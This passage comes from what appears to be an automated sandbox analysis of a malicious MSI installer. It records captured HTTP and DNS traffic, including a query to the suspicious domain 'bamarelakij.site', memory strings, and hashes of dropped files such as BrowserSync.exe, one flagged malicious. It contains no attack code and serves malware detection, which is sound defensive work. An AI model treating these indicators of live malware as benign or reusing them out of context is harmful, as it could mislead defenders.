hp%22,%22prg-tv-api%22,%22prg-tv-segcap10%22,%22prg-upsaip-w1-t%22,%22prg-vid-cd%22,%22prg-vid-trdcache%22,%22prg-widgets-manager%22,%22prg-widgets-region%22,%22prg-wtch-chsb-t2%22,%22prg-wx-dhgrd%22,%22prg-wx-pwafull%22]} HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1736430067774&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3AADB05FC3906D36247DA530C2F26CF4&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1736430067774&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3AADB05FC3906D36247DA530C2F26CF4&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B69ceef9c01beafbf02b721736430068; XID=1B69ceef9c01beafbf02b721736430068
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1736430067774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c0bbf685d83c442b9fe503242c20b6fc&activityId=c0bbf685d83c442b9fe503242c20b6fc&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=C7020E5FD97649BABA433FD711F27806&MUID=3AADB05FC3906D36247DA530C2F26CF4 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3AADB05FC3906D36247DA530C2F26CF4; _EDGE_S=F=1&SID=1568EDC37D376DE73348F8AC7CFA6C29; _EDGE_V=1; SM=T

Source: BrowserSync.exe, 0000000D.00000003.2384718488.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2409286120.000000000805A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comP`b equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2432835446.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2383274333.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2407491223.0000000008069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: .om/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-+jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'strict-dynamic' equals www.facebook.com (Facebook)
Source: BrowserSync.exe, 0000000D.00000003.2432835446.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2383274333.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2407491223.0000000008069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: .om/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-+jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'strict-dynamic' equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2384718488.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2409286120.000000000805A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: @www.facebook.comXb equals www.facebook.com (Facebook)
Source: BrowserSync.exe, 0000000D.00000003.2386370061.0000000002EFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: QLkO7L/KfbE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2386370061.0000000002EFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: QLkO7L/KfbE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/g.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2386370061.0000000002EFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: _!@rc 'nonce-+jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2384718488.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2409286120.000000000805A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: `www.youtube.com equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2386370061.0000000002EFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2386370061.0000000002EFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/g.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2432835446.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2383274333.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2407491223.0000000008069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: om/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-+jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'strict-dynamic' equals www.facebook.com (Facebook)
Source: BrowserSync.exe, 0000000D.00000003.2432835446.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2383274333.0000000008069000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2407491223.0000000008069000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: om/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-+jPlmFW1Jz7S6oc9HNNewztccmy5u3qcQLkO7L/KfbE=' 'strict-dynamic' equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2384718488.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2409286120.000000000805A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: BrowserSync.exe, 0000000D.00000003.2384718488.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2409286120.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2350514112.000000000805A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: BrowserSync.exe, 0000000D.00000003.2384718488.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2409286120.000000000805A000.00000004.00000001.00020000.00000000.sdmp, BrowserSync.exe, 0000000D.00000003.2350514112.000000000805A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comPK1 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: assets2.msn.com

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	8757
Entropy (8bit):	5.610195503395533
Encrypted:	false
SSDEEP:	96:Z/E1e5Hy+e+AAgUTV5sCsThqZUTV5sC6j5HNW0zD/Thq5Hq2QgBw9U3RixCYpVBc:ZM1+HTe2/B5jIbB5j4HLa/YpBHa
MD5:	935DFF3D2D9B8732C77B7F636A0CECB7
SHA1:	62550D8A44A3EC27609CEC75697562F75D41E987
SHA-256:	C4449C449CEBD6AA3F0EEAAC9C7EFCE2B60AD5717B4E373C79C45A395DEF1CA1
SHA-512:	0935E53A34285231DC20B8E05D384068C27C27E74B7E4AB309E3E9E048F5B54B5D811B62FD316B332F2036817080749D6658DBB2E78EDDD315CF94CF377BA3DF
Malicious:	false
Preview:	...@IXOS.@.....@.E)Z.@.....@.....@.....@.....@.....@......&.{A4D5D260-BC3C-4905-A008-87685F3200B7}..Crosseye..cLm7ThwEvh.msi.@.....@.....@.....@........&.{5E2B2133-C57F-46FB-BB7A-F28CBBECEB40}.....@.....@.....@.....@.......@.....@.....@.......@......Crosseye......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{A94A3233-111D-52C7-A546-BEDFF21F5FCF}&.{A4D5D260-BC3C-4905-A008-87685F3200B7}.@......&.{96ECA962-2331-5EE6-BF93-F0A18232790C}&.{A4D5D260-BC3C-4905-A008-87685F3200B7}.@......&.{108A4D54-834C-540F-A741-0C8863FFA486}&.{A4D5D260-BC3C-4905-A008-87685F3200B7}.@......&.{93623848-3CD1-5643-95AC-0C830796FB24}&.{A4D5D260-BC3C-4905-A008-87685F3200B7}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..(.C:\Users\user\AppData\Local\Temp\Caret\......C:\Users\user\AppData\Local\Temp\Caret\hv.exe....3.C:\Users\user\AppData\Local\Temp\Caret\iepdf32.dll....2.C:\Users\j

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	8094
Entropy (8bit):	5.804563288303436
Encrypted:	false
SSDEEP:	192:asNAu9eiRU9SQyktC6qRAq1k8SPxVLZ7VTiq:asNAC8LxtC6q3QxVNZTiq
MD5:	1230E9F9B321DC6A0E3EFBEF25427E0B
SHA1:	29A159DF3FD6C95655E221DB1A3F31EAFD2C53BE
SHA-256:	FE41CB64781D1C0202333AD0C6D48480BF4074BCB5961AD0BA7B506D17AC1800
SHA-512:	F8FBC22959C86E926C963F638C7E0FB6D7664F6DFD4426471086CDED3C8F1EF3ED36EC5382A4A859E6A2F6E73FEE8FEEB1A33E8A9FBAB745AFB832BB1AC6F6D0
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: LVkAi4PBv6.exe, Detection: malicious, Browse Filename: w3245.exe, Detection: malicious, Browse Filename: w3245.exe, Detection: malicious, Browse Filename: 9mauyKC3JW.exe, Detection: malicious, Browse Filename: ATLEQQXO.exe, Detection: malicious, Browse Filename: ATLEQQXO.exe, Detection: malicious, Browse Filename: upgrade.hta, Detection: malicious, Browse Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse Filename: UolJwovI8c.exe, Detection: malicious, Browse Filename: ONHQNHFT.msi, Detection: malicious, Browse
